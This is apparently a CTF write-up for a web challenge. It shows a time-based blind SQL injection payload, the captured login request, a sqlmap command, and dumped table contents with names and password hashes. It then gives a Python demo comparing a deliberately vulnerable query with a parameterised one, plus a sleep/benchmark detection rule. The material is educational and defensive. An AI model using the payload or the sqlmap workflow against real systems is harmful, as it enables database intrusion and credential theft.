[Web] guess id - jaivy

xp0int Posted on May 7 2018

The username field of the login form is vulnerable to time-based blind SQL injection:

```
{"username":"jaivy'and sleep(10) and '1'='1","password":"jaivy","__server__cookie__":{}}
```

So I captured the request, marked the injection point with an asterisk `*`, and fed it to sqlmap:

```
POST /login HTTP/1.1
Host: 123.59.134.192:8415
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json
Referer: http://123.59.134.192/
Content-Length: 63
Origin: http://123.59.134.192
Connection: close

{"username":"jaivy*","password":"jaivy","__server__cookie__":{}}
```

Using the `-r` parameter (and the usual follow-up commands):

```
python sqlmap.py -r 1.txt --current-db
```

This gives the following information:

```
[*] data
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

Database: data
[4 tables]
+-----------------+
| sensitive_visit |
| token_list      |
| user_info       |
| user_text       |
+-----------------+

Database: data
Table: user_info
[4 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| id             | int(1E)      |
| id_card_number | varchar(100) |
| name           | varchar(64)  |
| password       | varchar(35)  |
+----------------+--------------+
```

```
Database: data
Table: user_info
[10 entries]
+----------------------------------------------+
| id_card_number                               |
+----------------------------------------------+
| /+6jj+chVE3xTOMmlvqOf01QcSojhOCGX1OdbyNdPXw= |
| /+kpLdjPWRKkaNuLhkVm1T7hLYdDfgHFKf3K/DI5E4I= |
| /+zkN9u+GzkexlqPqcpc8zK6TkZKVeX1AVHUbG2bOgI= |
| /0CrajU+xYSHX2T2bswoub3OT8e5zw5og0rALfXcefg= |
| /0k3g+bUYzizDC+QC2F1zL3OT8e5zw5og0rALfXcefg= |
| /0OGfOnvp2lwuhuLhkVaf01QcSojhOCGX1OdbyNdPXw= |
| /+kpLdjPWRKkaNuLhkVm1T7hLYdDfgHFKf3K/DNdPXw= |
| /+kpLdjPWRKkaNuLhkVmaT7hLYdDfgHFKf3K/DI5E4I= |
| /+zkN9u+GzkexlqPqcpc8zK6TkZKVeX1AVHUbG2bOgI= |
| /+zy5PlSdgleEq3o0PH1us8ZuHQb8m8/qAHbDdUCnzE= |
+----------------------------------------------+

Database: data
Table: user_info
[6 entries]
+----+----------------------------------------------+-------------+----------------------------------+
| id | id_card_number                               | name        | password                         |
+----+----------------------------------------------+-------------+----------------------------------+
| 1  | G735+fZ5w84htVDHWflfJVAFwX8X+maoU9RopTeKTKk= | admin       | 8d5eef8ac0367b7177175b7609ef7cd0 |
| 2  | eKsUqzHbhtRnrKs07QNkA0P+7SDX6tQ4OD98+LC6qX4= | 123         | 202cb962ac59075b964b07152d2X4b70 |
| 3  | 4ojUpAFnwCN/7YtdPBrCpUyvnoYytm4bxMbwwmg25w0= | image       | b4581065ffc340bd0ee01d093a40d7ce |
| 4  | ijPtBAnnfIoAQMm9GYib3S0XY3pqMkeTKWw8JvVkra8= | admin1      | 21232f297a57a5a743894a0e4a801fc3 |
| 5  | 8/JADwnyRRElygit1C1H8P/v1Gf9Gk95Ao4gHMrijTg= | veneno      | f81f10e631f3c519d5a44d8da976fb67 |
| 6  | XIZrMs7G/qIn15tTN+a2jr3BRPRp0TkdJPvZLqtuHJY= | ciphertest1 | e10adc3949ba59abbe56e057f20f883e |
+----+----------------------------------------------+-------------+----------------------------------+
```

The dumped data is a bit puzzling, and the competition ended after this, so this challenge stayed unsolved at this point.
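The bug class behind this write-up is a login handler that splices the JSON `username` straight into the SQL text, and the blind-injection payload only works because the database exposes a time-delay primitive. The block below is an added example (not code from the write-up or from the challenge) that shows the vulnerable handler next to its parameterised replacement, and a request-body rule that flags the `sleep(`/`benchmark(` shape the payload relies on. It runs on an in-memory SQLite table standing in for the challenge's MySQL `user_info` table; the rows, the request bodies and the recording stand-in for `sleep()` are all constructed for the demo.

```python
import hashlib
import json
import re
import sqlite3

# Payload quoted in the write-up above.
PAYLOAD = "jaivy'and sleep(10) and '1'='1"

# Constructed request bodies in the challenge's JSON login format (sample data, not captured traffic).
REQUEST_BODIES = [
    '{"username":"jaivy","password":"jaivy","__server__cookie__":{}}',
    json.dumps({"username": PAYLOAD, "password": "jaivy", "__server__cookie__": {}}),
    '{"username":"o\'brien","password":"pw","__server__cookie__":{}}',  # legitimate apostrophe
    "not json at all",
]

# MySQL time-delay primitives that time-based blind injection depends on.
TIME_DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def flag_time_delay_fields(body: str) -> list:
    """Return the names of JSON string fields that contain a time-delay SQL primitive.

    A cheap WAF/log rule for the payload shape seen in the write-up. It does not
    detect injection in general (an apostrophe alone is normal input, see the
    o'brien body), so it complements parameterised queries rather than replacing them.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, dict):
        return []
    return sorted(k for k, v in data.items()
                  if isinstance(v, str) and TIME_DELAY_RE.search(v))


def md5_hex(text: str) -> str:
    # The dumped password column looks like unsalted MD5; mirrored here only so the demo matches the write-up.
    return hashlib.md5(text.encode()).hexdigest()


def build_demo_db():
    """In-memory SQLite stand-in for the challenge's `user_info` table (constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_info (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO user_info (name, password) VALUES (?, ?)", ("jaivy", md5_hex("jaivy")))
    conn.commit()

    # SQLite has no sleep(). Register a stand-in that records each call and returns 0
    # (as MySQL's SLEEP() does), so we can see whether injected SQL executes without waiting.
    sleep_calls = []

    def fake_sleep(seconds):
        sleep_calls.append(seconds)
        return 0

    conn.create_function("sleep", 1, fake_sleep)
    return conn, sleep_calls


def vulnerable_login(conn, username: str, password: str):
    # The bug class from the write-up: the username becomes part of the SQL text,
    # so a quote inside it closes the literal and the remainder is parsed as SQL.
    sql = ("SELECT id FROM user_info WHERE name='" + username +
           "' AND password='" + md5_hex(password) + "'")
    return conn.execute(sql).fetchall()


def safe_login(conn, username: str, password: str):
    # Parameterised query: the driver passes the username as data, never as SQL text.
    sql = "SELECT id FROM user_info WHERE name=? AND password=?"
    return conn.execute(sql, (username, md5_hex(password))).fetchall()


if __name__ == "__main__":
    for body in REQUEST_BODIES:
        print(flag_time_delay_fields(body), body)
    conn, calls = build_demo_db()
    vulnerable_login(conn, PAYLOAD, "jaivy")
    print("vulnerable handler evaluated sleep():", len(calls) > 0)
    calls.clear()
    safe_login(conn, PAYLOAD, "jaivy")
    print("parameterised handler evaluated sleep():", len(calls) > 0)
```

Run against the quoted payload, the concatenating handler calls the registered `sleep()` (the delay the write-up measured), while the parameterised handler matches no row and never evaluates it; the same apostrophe in `o'brien` trips neither the rule nor the safe query.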